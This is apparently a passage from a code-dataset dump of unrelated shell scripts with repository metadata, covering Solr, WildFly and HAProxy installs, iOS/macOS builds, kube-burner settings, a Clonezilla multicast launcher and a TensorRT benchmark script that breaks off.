# Fetch the Solr distribution and unpack the install script
wget -q "$SOLR_MIRROR/$SOLR_DIST.tgz"
tar xzf $SOLR_DIST.tgz $SOLR_DIST/bin/install_solr_service.sh --strip-components=2
# Install and start the service using the install script
bash ./install_solr_service.sh $SOLR_DIST.tgz -u $SOLR_USER -d $SOLR_MUTABLE -i $SOLR_INSTALL
# Remove Solr distribution
rm $SOLR_DIST.tgz
rm ./install_solr_service.sh
# Stop Solr until we have created the core
service solr stop
# Create Sufia Solr core
cd $SOLR_DATA
$RUN_AS_SOLR_USER mkdir -p ${SOLR_CORE}/conf
$RUN_AS_SOLR_USER echo "name=$SOLR_CORE" > ${SOLR_CORE}/core.properties
install -o $SOLR_USER -m 444 $HYDRA_HEAD_DIR/solr_conf/conf/solrconfig.xml ${SOLR_CORE}/conf/solrconfig.xml
install -o $SOLR_USER -m 444 $HYDRA_HEAD_DIR/solr_conf/conf/schema.xml ${SOLR_CORE}/conf/schema.xml
# Make links to keep the Hydra Solr solrconfig.xml paths happy
$RUN_AS_SOLR_USER ln -s $SOLR_INSTALL/solr/contrib
$RUN_AS_SOLR_USER ln -s $SOLR_INSTALL/solr/dist
$RUN_AS_SOLR_USER mkdir lib
$RUN_AS_SOLR_USER ln -s $SOLR_INSTALL/solr/contrib lib/contrib
# Adjust logging settings
$RUN_AS_SOLR_USER sed -i 's/^log4j.rootLogger=.*$/log4j.rootLogger=INFO, file/' /var/solr/log4j.properties
$RUN_AS_SOLR_USER sed -i "s/file.MaxFileSize=.*$/file.MaxFileSize=${SOLR_LOGSIZE}/" /var/solr/log4j.properties
| true |
418bdba0026b72f4e07800fce94a5b2d1f62cfcc
|
Shell
|
ianpreston/oh-my-py
|
/install.sh
|
UTF-8
| 485 | 3.328125 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/sh
if [ ! -d "extension" ]; then
echo "Script must be run from within oh-my-py install directory"
exit 1
fi
ipython profile create sh
rm $HOME/.ipython/profile_sh/ipython_config.py || true
rm $HOME/.ipython/extensions/ohmypy || true
ln -s `pwd`/extension $HOME/.ipython/extensions/ohmypy
ln -s `pwd`/config.py $HOME/.ipython/profile_sh/ipython_config.py
echo "Success! Now run IPython like this: $ ipython --profile sh"
echo "See `pwd`/README.md for more information"
| true |
7b093abdb0bac3c202650974e682bcb1764a42de
|
Shell
|
jtaleric/plow
|
/workloads/baseline-performance/common.sh
|
UTF-8
| 777 | 2.78125 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
source ../../utils/common.sh
openshift_login
export KUBE_BURNER_RELEASE_URL=${KUBE_BURNER_RELEASE_URL:-latest}
export ENABLE_INDEXING=${ENABLE_INDEXING:-true}
export ES_SERVER=${ES_SERVER:-https://search-perfscale-dev-chmf5l4sh66lvxbnadi4bznl3a.us-west-2.es.amazonaws.com:443}
export ES_INDEX=${ES_INDEX:-ripsaw-kube-burner}
export WRITE_TO_FILE=${WRITE_TO_FILE:-false}
# Time duration for which kube-burner will collect metrics
export WATCH_TIME=${WATCH_TIME:-30}
export UUID=${UUID:-$(uuidgen)}
export PROM_URL=https://$(oc get route -n openshift-monitoring prometheus-k8s -o jsonpath="{.spec.host}")
export PROM_TOKEN=$(oc -n openshift-monitoring sa get-token prometheus-k8s)
log(){
echo -e "\033[1m$(date "+%d-%m-%YT%H:%M:%S") ${@}\033[0m"
}
| true |
63a58e0fdb6c0c3e447a3e60a212d8b7f0f51c5d
|
Shell
|
andrewreach/XcodeGen
|
/Tests/Fixtures/TestProject/build.sh
|
UTF-8
| 961 | 2.671875 | 3 |
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
set -e
CARTHAGE_DYNAMIC_FRAMEWORKS=(Result)
CARTHAGE_STATIC_FRAMEWORKS=(SwiftyJSON swift-nonempty)
carthage bootstrap $CARTHAGE_DYNAMIC_FRAMEWORKS --cache-builds
# Prepare xcconfig for static bootstrapping
STATIC_CONFIG=$(mktemp -d)/static.xcconfig
echo "MACH_O_TYPE = staticlib" > $STATIC_CONFIG
XCODE_XCCONFIG_FILE=$STATIC_CONFIG \
carthage bootstrap $CARTHAGE_STATIC_FRAMEWORKS --cache-builds
echo "
⚙️ Building iOS app"
xcodebuild -quiet -workspace Workspace.xcworkspace -scheme "App_iOS Test" -configuration "Test Debug" CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO CODE_SIGN_ENTITLEMENTS="" CODE_SIGNING_ALLOWED="NO"
echo "✅ Successfully built iOS app"
echo "
⚙️ Building macOS app"
xcodebuild -quiet -workspace Workspace.xcworkspace -scheme "App_macOS" -configuration "Test Debug" CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO CODE_SIGN_ENTITLEMENTS="" CODE_SIGNING_ALLOWED="NO"
echo "✅ Successfully built macOS app"
| true |
e91cc4c8b964091e0af1cfd09035a44baed3fb3f
|
Shell
|
Moorviper/zen2vdr
|
/build.sh
|
UTF-8
| 344 | 2.5625 | 3 |
[] |
no_license
|
#!/bin/bash
BASEDIR=`pwd`
cd zentoo-kernel-build
./build.sh
cd $BASEDIR
cd zentoo-os-build
./build.sh
cd $BASEDIR
cd zentoo-smt-tools
PREFIX="/zensysgen-glibc" ./build.sh
cd $BASEDIR
cd zenvdr-build
RESOURCE="R2" TARGET_DIR="/zensysgen-glibc" METHOD="tar" ./build.sh
cd $BASEDIR
cd zenvdr-init
./install.sh "/zensysgen-glibc"
cd $BASEDIR
| true |
75b56251f9a2d6e408efbe1759da05ede197ad13
|
Shell
|
thomasdarimont/akvo-provisioning
|
/puppet/modules/butler/templates/update.sh.erb
|
UTF-8
| 722 | 3.203125 | 3 |
[] |
no_license
|
#!/bin/bash
set -e
BRANCH=$1
ORIG_DIR=`pwd`
HERE="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
VENV=<%= @approot %>/venv
CODE=<%= @approot %>/code
MANAGE=<%= @approot %>/manage.sh
if [ ! -d $VENV ]
then
virtualenv $VENV
fi
if [ ! -d <%= @approot %>/code ]
then
git clone https://github.com/akvo/butler.git $CODE
fi
cd $CODE
git checkout $BRANCH
git pull origin $BRANCH
cd $ORIG_DIR
PIP=$VENV/bin/pip
$PIP install -e $CODE[mysql] --upgrade --pre
sudo /usr/bin/supervisorctl stop butler_web
sudo /usr/bin/supervisorctl stop butler_worker
$MANAGE syncdb --noinput
$MANAGE migrate
$MANAGE collectstatic --noinput
sudo /usr/bin/supervisorctl start butler_web
sudo /usr/bin/supervisorctl start butler_worker
| true |
62219d7e0a34eaec422f072824a33b9f2be15677
|
Shell
|
christopherdoyle/dotfiles
|
/scripts/check-environment.sh
|
UTF-8
| 588 | 3.375 | 3 |
[] |
no_license
|
#!/bin/bash
commands=( "wget" "curl" "htop" "vim" "nvim" "go" "python" "python3" )
for item in "${commands[@]}"
do
if command -v "$item" &> /dev/null; then
word="yes"
else
word="no"
fi
printf "%-15s%s\n" "$item" "$word"
done
if command -v python &> /dev/null && python -m pip &> /dev/null; then
printf "%-15s%s\n" "python pip" "yes"
else
printf "%-15s%s\n" "python pip" "no"
fi
if command -v python3 &> /dev/null && python3 -m pip &> /dev/null; then
printf "%-15s%s\n" "python3 pip" "yes"
else
printf "%-15s%s\n" "python3 pip" "no"
fi
| true |
e1f07804d44249e14fbf597be02078eadbdfe4ac
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/python2-myhdl-git/PKGBUILD
|
UTF-8
| 918 | 2.578125 | 3 |
[] |
no_license
|
# Maintainer: Alex Forencich <alex@alexforencich.com>
pkgname=python2-myhdl-git
pkgver=0.9.0.r29.g983a169
pkgrel=1
pkgdesc="a Python-Based Hardware Description Language"
arch=('any')
url="http://www.myhdl.org/"
license=('LGPL')
depends=('python2' 'iverilog')
makedepends=('git')
provides=('python2-myhdl')
_gitroot='https://github.com/jandecaluwe/myhdl.git'
_gitname='myhdl'
source=("$_gitname::git+$_gitroot")
md5sums=('SKIP')
pkgver() {
cd "$srcdir/$_gitname"
git describe --tags --long | sed -E 's/^v//;s/([^-]*-g)/r\1/;s/-/./g'
}
build() {
cd "$srcdir/$_gitname"
cd $srcdir/$_gitname/cosimulation/icarus
make
}
package() {
cd "$srcdir/$_gitname"
python2 setup.py install --prefix=/usr --root="$pkgdir/" --optimize=1
install -m 0644 -D ./LICENSE.txt $pkgdir/usr/share/licenses/$pkgname/LICENSE.txt
install -m 0755 -D $srcdir/$_gitname/cosimulation/icarus/myhdl.vpi $pkgdir/usr/lib/ivl/python2-myhdl.vpi
}
| true |
0a4ac07e95426563843589045b4e818f23a47214
|
Shell
|
yasuhiroki/iypymtiycaa
|
/zshef/cookbooks/nodejs/firebase.zshef
|
UTF-8
| 558 | 2.65625 | 3 |
[] |
no_license
|
#!/usr/bin/env zsh
function zshef::install() {
zshef::util::mng::is_installed "firebase" || {
my::install::firebase
}
}
function zshef::update() {
zshef::util::mng::is_installed "firebase" && {
my::install::firebase
}
}
function my::install::firebase() {
zshef::util::mng::is_installed "node" || {
zshef::util::log::error "Depends node"
return 1
}
zshef::util::mng::is_installed "npm" || {
zshef::util::log::error "Depends npm"
return 1
}
npm install -g firebase-tools
}
| true |
820e65b9b7bf352bf383b41bc6dede6ff5deb4b9
|
Shell
|
luroto/holberton-system_engineering-devops
|
/0x0F-load_balancer/1-install_load_balancer
|
UTF-8
| 621 | 2.5625 | 3 |
[] |
no_license
|
#!/usr/bin/env bash
# This script installs and configures HAproxy as load balancer
sudo apt-get install software-properties-common -y
sudo add-apt-repository ppa:vbernat/haproxy-1.8 -y
sudo apt-get update -y
sudo apt-get install haproxy=1.8.\* -y
echo "ENABLED=1" |sudo tee -a /etc/default/haproxy
sudo service haproxy start
echo -e "frontend http\n \tbind *:80\n \tmode http\n \tdefault_backend holberton\n backend holberton\n \tmode http\n \tbalance roundrobin\n \tserver 774-web-01 35.237.52.158:80 check\n \tserver 774-web-02 34.74.28.162:80 check" | sudo tee -a /etc/haproxy/haproxy.cfg
sudo service haproxy restart
| true |
c5189c4fa38f4ac26743cc82b09a7a3db1a4816b
|
Shell
|
sio2sio2/clonaton
|
/app/modules/clonezilla/scripts/dcs.sh
|
UTF-8
| 19,374 | 3.53125 | 4 |
[] |
no_license
|
#!/bin/sh
#
# Lanza clonezilla multiserver preparando
# la línea de comandos de drbl-ocs.
# Puede lanzarse en el propio servidor (ver dcs -h).
#
DRBL_PATH="`dirname $0`/../drbl"
DRBL_OCS="$DRBL_PATH/sbin/drbl-ocs"
# Opciones predeterminadas que se pasan al drbl-ocs
# del servidor y el ocs-sr del cliente.
OPTS="--batch
-g auto
-e1 auto
-e2
-r
-j2
-l es_ES.UTF-8"
title="Lanzador de clonación multicast"
SCRIPTDIR=$(dirname $0)
. "$SCRIPTDIR/lib/dialog.sh"
. "$SCRIPTDIR/lib/utils.sh"
vars
PHPUTILS=$(readlink -f "$SCRIPTDIR/../utils.php")
eval "$(php -d error_reporting=E_STRICT -r 'require("'"$PHPUTILS"'");
echo "lista_aulas=\"".lista_aulas()."\"\n";
')"
help() {
echo "$(basename $0) [opciones] [operación] [imagen] [dispositivo [...]]
Lanzador de clonezilla para restauracióon multicast.
+ Opciones:
-b, --batch Obliga a que toda la información se
proporcione por línea de comandos y
falla en caso contrario.
-c, --client-to-wait NUM Número de clientes cuya conexión espera
el servidor antes de comenzar la
restauracion multicast.
-h, --help Muestra esta misma ayuda.
-i, --mcast-iface IFACE Interfaz de escucha para multicast.
-n, --no-poweroff No apaga el servidor al término de la
operación.
-o, --poweroff Apaga el servidor al término de la
operación.
-p, --post [true|poweroff|reboot] Orden que se enviará al cliente al fin
de la restauración. \"true\" significa que
que el cliente quedará encendido con la
línea de comandos habilitada..
-r, --room AULA Aula en la que se desea realizar la
clonación multicast. Es altirnativa a
-i, aunque menos prioritaria.
-s, --simulate Muestra la orden que arranca clonezilla
server, pero no la ejecuta.
-t, --max-time-to-wait SEGUNDOS Tiempo máximo en segundos desde la
conexión del primer cliente que esperará
el servidor antes de empezar la
restauracón. Por defecto, 0, que
significa que esperará indefinidamente
hasta que se conecte el número de
clientes especificado con la opción -c.
+ Operación:
startdistk Resataura discos completos.
startparts Restaura particiones individuales.
stop Cancela una restauración ya lanzada.
+ Imagen es el nombre de la imagen que se quiere restaurar, si solo se indica
un nombre y se buscará en el directorio predeterminado de imágenes. Si se
indica una ruta completa, se tomará ésta como el directorio que contiene la
imagen.
En el caso de que la operación sea "stop" representa la imagen de la que
se quiere parar el lanzamiento.
+ Dispositivos son aquellos discos (startdisk) o particiones (startparts) que
se pretenden restaurar.
A menos que se incluya la opción -b, se preguntará mediante cuadros de diálogo
aquellos datos necesarios para completar la orden que no tiene valor
predeterminado.
"
}
#
# Obtiene la red a la que pertenece un aula
# $1: Nombre del aula
#
get_network() {
echo "$lista_aulas" | grep -oP '(?<=^'"$1"'=)[^,]+(?=,)'
}
#
# Lista las interfaces configuradas y su dirección ip
#
list_ifaces() {
# A la IP le quitamos la máscara.
ip -f inet -o addr show | awk '{print $2 "=" substr($4, 0, index($4, "/"))}'
}
#
# Determina si una ip pertenece a una red.
# (requiere python3)
# $1: La dirección ip
# $2: La dirección de red en formato CIDR
#
# return 0, si pertenece.
ip_in_network() {
local python=`which python3`
python=${python:-`which python`}
$python -c 'import ipaddress as ip; exit(ip.ip_address("'$1'") not in ip.ip_network("'$2'"))' 2>/dev/null
}
#
# Obtiene la interfaz a la que está asociada un aula.
# $1: Aula
#
# return El nombre de la interfaz
#room2iface() {
# local net x ip
# net=$(get_network "$1") || return 1
#
# for x in $(list_ifaces); do
# ip=${x#*=}
# if ip_in_network $ip $net; then
# echo ${x%=*}
# return 0
# fi
# done
# return 1
#}
room2iface() {
echo "$lista_aulas" | awk -F"[,=]" '$1 =="'$1'" {print $3}' | grep '.'
}
#
# Obtiene el aula a la que está asociada una interfaz
# $1: Interfaz
#
# return El nombre del aula
#iface2room() {
# local IFS linea aula net ip=$(list_ifaces | grep -oP '(?<=^'"$1"'=).+$')
# IFS='
#'
# for linea in $lista_aulas; do
# aula=${linea%%=*}
# net=${linea#*=} ; net=${net%%,*}
# if ip_in_network $ip $net; then
# echo $aula
# return 0
# fi
# done
# return 1
#}
iface2room() {
echo "$lista_aulas" | awk -F'[,=]' '$3 =="'$1'" {print $1}' | grep '.'
}
#
# Determina si el argumento es un número
# $1: Argumento a comprobar.
#
es_numero() {
echo "$1" | egrep -q '^[0-9]+$'
}
#
# Nuestra un mensaje de error y acaba el programa.
# $1: El código de error.
# $2: El mensaje de error.
#
eerror() {
local code=$1
shift
echo "$*" >&2
exit $code
}
#
# Calcula el directorio de la imagen
# $1: El nombre de la imagen o la ruta al directorio de la imagen
# si es una ruta absoluta.
#
get_imgdir() {
local image="$1" desc
# Si empieza por /, es una ruta absoluta.
[ -z "${1%%/*}" ] && echo "$image" && return 0
for desc in "$imgdir/$image/$descfile"; do
read_desc "$desc" x
[ "$x_nombre" = "$1" ] && dirname "$desc" && return 0
done
return 1
}
#
# Lista los discos de una imagen
# $1: La ruta al directorio de la imagen
#
list_disks() {
cat "$1"/disk
}
#
# Lista las particiones de una imagen
# $1: La ruta al directorio de la imagen
#
list_parts() {
cat "$1"/parts
}
#
# Comprueba que los dispositivos sean los adecuados. Tienen que ser
# discos si la operación es startdisk o particiones si es startparts
# $1: Operación
# $2: Ruta al directorio de la imagen
# $3, etc.: Los dispositivos.
#
check_devices() {
local action="$1" imagedir="$2" devices parts
shift 2
case $action in
startdisk)
devices=$(list_disks "$imagedir")
;;
startparts)
devices=$(list_parts "$imagedir")
;;
stop) return 0 ;;
*) eerror 3 "$action: Operación incorrecta";;
esac
while [ $# -gt 0 ]; do
echo "$devices" | grep -qw "$1" || { echo $1; return 1; }
shift
done
return 0
}
#
# Comprueba si la restauración de la imagen está lanzada.
# $1: La imagen.
#
restoring_image() {
[ -f $(echo "$multifile" | sed -r 's:\{\{image\}\}:'"$1:") ]
}
#
# Comprueba si desde un aula, puede verse una imagen
# $1: El aula
# $2: La visibilidad de la imagen
#
visible_from_room() {
local aula=$1
shift
echo $* | egrep -q '@(?'"$aula"'\b|\*)?(?\s|$)'
}
#
# Lista las imágenes visbles
# $1: Aula desde la que se ven las imágenes (o nada, que implica cualquiera)
# $2: Vacío si quieren listarse todas las imágenes visibles, 0, si quieren
# listarse sólo las imágenes visibles que no están restaurándose; y
# 1, si lo contrario.
#
# return: Una lista en que cada línea tiene el aspecto:
#
# '/ruta/a/la/imagen' 'descripción o nombre'
#
list_images() {
local aula=$1 desc
for desc in "$imgdir"/*/"$descfile"; do
read_desc "$desc" x
[ -n "$aula" ] && ! visible_from_room "$aula" $x_visibilidad && continue
if [ -n "$2" ]; then
{ [ $2 -eq 0 ] && ! restoring_image $x_nombre; } || \
{ [ $2 -eq 1 ] && restoring_image $x_nombre; } || continue
fi
echo "'$(dirname $desc)' '${x_desc:-$x_nombre}'"
done
}
#
# Lista todas las aulas en que es visible una imagen
# Si no se especifica, se devuelven todas las aulas.
# $1: La ruta al directorio de la imagen
#
# return: Una lista en que cada línea tiene el aspecto:
#
# aula 'descripción o nombre'
#
list_aulas() {
local imagedir=$1 linea
[ -n "$imagedir" ] && read_desc "$imagedir/$descfile" x
echo "$lista_aulas" | while read linea; do
aula=${linea%%=*}
desc=${linea##*,}
[ -n "$imagedir" ] && ! visible_from_room $aula $x_visibilidad && continue
iface=$(room2iface "$aula") || continue
echo "$iface '${desc:-$aula}'"
done
}
#
# Pregunta por la imagen que se desea clonar
# $1: Aula desde la que se clona (o nada)
#
# return: El directorio de la imagen
# + 0: Si se seleccionó una imagen
# + 1: Si no hay imágenes disponibles
# + 2: Si se canceló la selección
#
pregunta_imagen() {
local aula=$1 resp items num
items=$(list_images "$aula" 0)
eval set -- $items
num=$(($#/2))
case $num in
0) return 1;;
1) resp=${items%% *};;
*) resp=$(dialog --notags --menu "Escoja la imagen a clonar" \
$(menu_height num) 75 $num "$@") || return 2
;;
esac
eval echo $resp
}
#
# Pregunta el aula desde la que se piensa clonar
# $1: La ruta de la imagen (o nada)
# $2: El nombre de la imagen
#
# return: El nombre del aula y el código de estado
# + 0: Si se seleccionó un aula
# + 1: Si no se puede seleccionar aula, porque la
# imagen no es visible desde ninguna.
# + 2: Si se canceló la selección
#
pregunta_aula() {
local imagedir="$1" image="$2" resp items num leyenda="Seleccione el aula"
items=$(list_aulas "$imagedir")
eval set -- $items
num=$(($#/2))
[ -z "$items" ] && num=0
[ -n "$image" ] && leyenda="${leyenda} para clonar $image"
case $num in
0) return 1;;
1) resp=${items%% *};;
*) resp=$(dialog --menu "$leyenda" $(menu_height num) 75 $num "$@") || return 2
;;
esac
echo $resp
}
#
# Pregunta los clientes sobre los que se quiere restaurar la imagen
# $1: Aula donde se realiza la clonación
#
pregunta_clientes() {
local aula="$1" resp
resp=$(dialog --inputbox "¿Sobre cuántos clientes en *$aula* desea realizar la restauración?" 10 55) || return 2
es_numero "$resp" || { echo "Se requiere un número natural" && return 1; }
echo $resp
}
#
# Pregunta el tiempo de temporización
#
pregunta_tiempo() {
local resp
resp=$(dialog --inputbox "Temporización (en minutos)" 10 55 "10") || return 2
es_numero "$resp" || { echo "Se requiere un número entero" && return 1; }
echo $resp
}
#
# Pregunta la acción que se desea realizar.
#
# return: Imprime una de las tres acciones
#
pregunta_accion() {
local action="$1" resp
items="startdisk 'Restaurar discos completos'
startparts 'Restaurar particiones individuales'
stop 'Cancelar clonación multicast'"
eval set -- $items
dialog --notags --menu "Escoja la operación a realizar" $(menu_height 3) 45 3 "$@"
}
#
# Pregunta qué discos se restaurán (startdisk)
# $1: Ruta al directorio de la imagen
#
pregunta_disks() {
local imagedir="$1" cylinders heads sectors
local disks="$(list_disks "$imagedir")" disk items
local num=$(echo "$disks" | wc -w)
[ $num -eq 1 ] && echo $disks && return 0
for disk in $disks; do
eval $(cat "$imagedir"/$disk-chs.sf)
# La línea será "sda [~500GB]"
items=${items:+$items }" $disk [~$((cylinders*heads*sectors/2/1024/1024))G] 0"
done
eval set -- $items
dialog --checklist "Seleccione los discos a restaurar" \
$(menu_height $num) 45 $num "$@" || return 2
}
#
# Pregunta que particiones se restaurarán (startparts)
# $1: Ruta al directorio de la imagen
#
pregunta_parts() {
local imagedir="$1"
local parts="$(list_parts "$imagedir")" part items
local num=$(echo "$parts" | wc -w)
[ $num -eq 1 ] && echo $parts && return 0
while read line; do
part=$(echo $line | egrep -o '^\w+')
echo "$parts" | grep -qw "$part" || continue
# La línea será "sda3 'ntfs :: 850M' 0"
items=${items:+$items }"$part '$(echo $line | awk '{printf "%6s :: %6s\n", $3, $5}')' 0"
done < "$imagedir"/blkdev.list
eval set -- $items
dialog --checklist "Seleccione las particiones a restaurar" \
$(menu_height $num) 45 $num "$@" || return 2
}
#
# Averigua qué debe sugerirse sobre el apagado del servidor
#
# return:
# 1, debe apargarse el servidor.
# 0, no debe hacerse.
#
get_server_off() {
parse_conf x
[ $x_dhcp_type -ne 2 ]
}
#
# Genera las opciones para drbl-ocs
#
get_opts() {
local opts="$OPTS -or / -o0 -o1 -x -k -p $post --clients-to-wait $clients --mcast-iface $iface"
[ $time -gt 0 ] && opts="$opts --max-time-to-wait $((time*60))"
# Para que no se haya comprobación es necesrio añadir la opción -sc0
[ "$check" != "1" ] && opts="$opts -sc0"
echo $opts "$action multicast_restore '$imagedir' $devices"
}
#
# Genera las opciones con que debe arrancarse el cliente.
#
get_client_opts() {
local DRBL_CONF="$DRBL_PATH/etc/drbl-ocs.conf"
local port=$(grep -oP '(?<=^MULTICAST_PORT=")[0-9]+' "$DRBL_CONF")
local opts="$(echo $OPTS) -p $post --mcast-port $port"
[ $time -gt 0 ] && opts="${opts} --max-time-to-wait $time"
echo "$opts multicast_restore${action#start} $(basename "$imagedir") $devices"
}
# Parámetros
batch=
clients=
iface=
#postaction=poweroff # Definida en la configuración PHP
#server_off=2 # Definida en la configuración PHP
room=
simulate=
time=0 ; cltime=
action=
imagedir=
devices=
#
# Análisis de argumentos
#
while [ $# -gt 0 ]; do
case $1 in
-b|--batch)
batch=1
shift
;;
-c|--client-to-wait)
es_numero "$2" || eerror 2 "$2: Número de clientes inválido"
[ $2 -gt 0 ] || eerror 2 "El número de clientes debe ser al menos 1"
clients=$2
shift 2
;;
-h|--help)
help
exit 0
;;
-i|--mcast-iface)
echo /sys/class/net/* | egrep -q '/'"$2"'\b' || eerror 2 "$2: La interfaz no existe"
iface="$2"
shift 2
;;
-o|--poweroff)
server_off=1
shift
;;
-n|--no-poweroff)
server_off=0
shift
;;
-p|--post)
[ "$2" = "poweroff" ] || [ "$2" = "reboot" ] || [ "$2" = "true" ] || eerror 2 "$2: Acción desconocida"
postaction=$2
shift 2
;;
-r|--room)
get_network "$2" > /dev/null || eerror 2 "$2: Aula desconocida"
room=$2
shift 2
;;
-s|--simulate)
simulate=1
shift
;;
-t|--max-time-to-wait)
es_numero "$2" || eerror 2 "$2: Tiempo en segundos inválido"
time=$2
shift 2
cltime=1 # Marcamos que se fijó un tiempo.
;;
-*) eerror 2 "$1: Opción desconocida"
;;
*) break
;;
esac
done
if [ -n "$iface" ]; then
room=$(iface2room "$iface") || eerror 2 "La interfaz no está asociada a ningún aula"
elif [ -n "$room" ]; then
iface=$(room2iface "$room") || eerror 2 "El aula seleccionada no está asociada a ninguna interfaz"
fi
# Análisis de la operación
if [ -n "$1" ]; then
[ "$1" = "startdisk" ] || [ "$1" = "startparts" ] || [ "$1" = "stop" ] || \
eerror 2 "$1: Operación desconocida"
action=$1
shift
fi
# Análisis de la imagen
if [ -n "$1" ]; then
imagedir=$(get_imgdir "$1") || eerror 2 "$1: La imagen no existe"
shift
aulas=$(list_aulas "$imagedir")
[ -n "$room" ] && aulas=$(echo "$aulas" | egrep ^$iface'\b')
[ -z "$aulas" ] && eerror 2 "La imagen no es visible${room:+ desde $room}"
fi
# Análisis de los dispositivos
if [ $# -gt 0 ]; then
# ask_user equivale a no poner nada, para forzar la pregunta
if [ "$*" = "ask_user" ]; then
shift 1
else
dev=$(check_devices "$action" "$imagedir" "$@") || eerror 2 "$dev: Dispositivo inválido o inexistente para la operación ${action:-?}"
fi
else
# TODO: Podría verse si sólo hay unn dispositivo posible.
true
fi
devices=$*
if [ -n "$batch" ]; then
case "$action" in
stop) [ -z "$room" ] && eerror 2 "Modo batch: faltan datos";;
*) { [ -z "$room" ] || [ -z "$clients" ] || [ -z "$imagedir" ] || \
[ -z "$action" ] || [ -z "$devices" ]; } && eerror 2 "Modo batch: faltan datos";;
esac
fi
#
# Completamos los datos necesarios no facilitados en la línea
#
while [ -z "$action" ]; do
action=$(pregunta_accion "$action") || cancel "¿Desea cancelar el lanzamiento?"
done
while [ -z "$imagedir" ]; do
imagedir=$(pregunta_imagen "$room")
case $? in
0) ;;
1) error "No hay imágenes disponibles en $room" ; exit 1;;
2) cancel "¿Desea cancelar la operación?";;
esac
done
image=$(read_desc "$imagedir/$descfile" x; echo $x_nombre)
while [ -z "$iface" ]; do
iface=$(pregunta_aula "$imagedir" "$image")
case $? in
0) ;;
1) error "$image no es visible desde ningún aula"; exit 1;;
2) cancel "¿Desea cancelar el lanzamiento?";;
esac
done
room=$(iface2room "$iface")
if [ "$action" = "stop" ]; then
if [ -n "$simulate" ]; then
echo $DRBL_OCS -or / -o1 --mcast-iface "$iface" stop xxxx "$imagedir"
else
$DRBL_OCS -or / -o1 --mcast-iface "$iface" stop xxxx "$imagedir"
fi
exit 0
fi
while [ -z "$clients" ]; do
clients=$(pregunta_clientes "$room")
status=$?
[ "$clients" = "0" ] && status=2 # Si clientes=0 se pregunta si se quiere cancelar.
case $status in
0) break ;;
1) error "$clients"
clientes=
;;
2) cancel "¿Desea cancelar el lanzamiento?";;
esac
done
while [ -z "$cltime" ]; do
time=$(pregunta_tiempo "$time")
case $? in
0) cltime=1;;
1) error "$time";;
2) cancel "¿Desea cancelar el lanzamiento?";;
esac
done
while [ -z "$devices" ]; do
case $action in
startdisk) devices=$(pregunta_disks "$imagedir") || cancel "¿Desea cancelar el lanzamiento?";;
startparts) devices=$(pregunta_parts "$imagedir") || cancel "¿Desea cancelar el lanzamiento?";;
stop) break;;
*) eerror 5 "$action imposible";;
esac
done
# Quitamos las comillas que añade whiptail a la lista de dispositivos
eval devices=\"$devices\"
while [ "$server_off" = "2" ]; do
get_server_off
off=$?
[ $off -eq 1 ] && default=2
lapso=$(pregunta_lapso "$default" $off)
case $? in
0) break;;
1) ;;
2) cancel "¿Desea cancelar el lanzamiento?";;
esac
done
if [ "$simulate" ]; then
echo $DRBL_OCS $(get_opts)
[ -n "$lapso" ] && echo "Se apagará el servidor $lapso segundos después de haber acabado"
else
eval set -- $(get_opts)
export DELAY="$lapso" OPTS="`get_client_opts`"
nohup $DRBL_OCS "$@" > /dev/null 2>&1 &
dialog --msgbox "Preparada la restauración multicast de $image. Ya puede incorporar clientes." 8 60
fi
| true |
6943d37c9d6c1a3615c95df886b5b95c3eb91032
|
Shell
|
inissa/system-management
|
/buildscripts/buildintltool
|
UTF-8
| 331 | 2.734375 | 3 |
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
#!/bin/bash -e
export PKGNAME=intltool
export PKGVER=0.51.0
export PKGTAR=${PKGNAME}-${PKGVER}.tar.gz
export PKGURL="https://launchpad.net/intltool/trunk/${PKGVER}/+download/${PKGTAR}"
export MAKE_JOBS_FLAGS="-j4"
export KEEP_STATIC=1
configure_pre() {
sed -i 's:\\\${:\\\$\\{:' intltool-update.in
}
. $(dirname $0)/master.sh
| true |
d18e8a63caae387993e26404dc58da35bc1eb61f
|
Shell
|
v-arcade/wildfly_vRA
|
/WildFly11_install_script_vRA.sh
|
UTF-8
| 606 | 3.15625 | 3 |
[] |
no_license
|
#! /bin/bash
echo "External Repo value=" $ExternalRepo
if [ $useExternalRepo = "Yes" ];
then
echo "Getting file from External Repo"
wget --no-check-certificate -O /tmp/wildfly-11.0.0.CR1.tar.gz $repoURL/wildfly-11.0.0.CR1.tar.gz
cd /tmp
/bin/gunzip /tmp/wildfly-11.0.0.CR1.tar.gz
mv /tmp/wildfly-11.0.0.CR1.tar $wildflyHome
else
echo "Using local Repo"
cd $sourceLoc
/bin/gunzip $sourceLoc/wildfly-11.0.0.CR1.tar.gz
mv $sourceLoc/wildfly-11.0.0.CR1.tar $wildflyHome
fi
cd $wildflyHome
/bin/tar -xvf $wildflyHome/wildfly-11.0.0.CR1.tar
| true |
2a95608b66ddde85129e5cd01ee3a249a391a48c
|
Shell
|
ScallyBag/jetson-inference
|
/tools/benchmark-models.sh
|
UTF-8
| 1,802 | 3.6875 | 4 |
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# this script benchmarks DNN models from jetson-inference
# using the TensorRT trtexec tool and logs the results.
#
# usage: ./benchmark-models.sh <log-dir> <iterations> <runs>
#
# trtexec will profile the execution time of the network
# over N iterations, each iteration averaging over M runs.
#
# If unspecified, the default number of iterations is 10.
# If unspecified, the default number of average runs is 10.
#
# If the output log directory is left unspecified, the logs
# will be saved under the benchmark_logs/ directory.
#
ROOT="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
NETWORKS="$ROOT/../data/networks"
TRT_EXEC=/usr/src/tensorrt/bin/trtexec
LOG_DIR=$1
ITERATIONS=$2
AVG_RUNS=$3
if [ -z "$LOG_DIR" ]; then
LOG_DIR="benchmark_logs"
fi
if [ -z "$ITERATIONS" ]; then
ITERATIONS="10"
fi
if [ -z "$AVG_RUNS" ]; then
AVG_RUNS="10"
fi
mkdir $LOG_DIR
function benchmark_onnx()
{
model_dir=$1
model_name=$2
output_layer=$3
if [ -z "$model_name" ]; then
model_name="fcn_resnet18.onnx"
fi
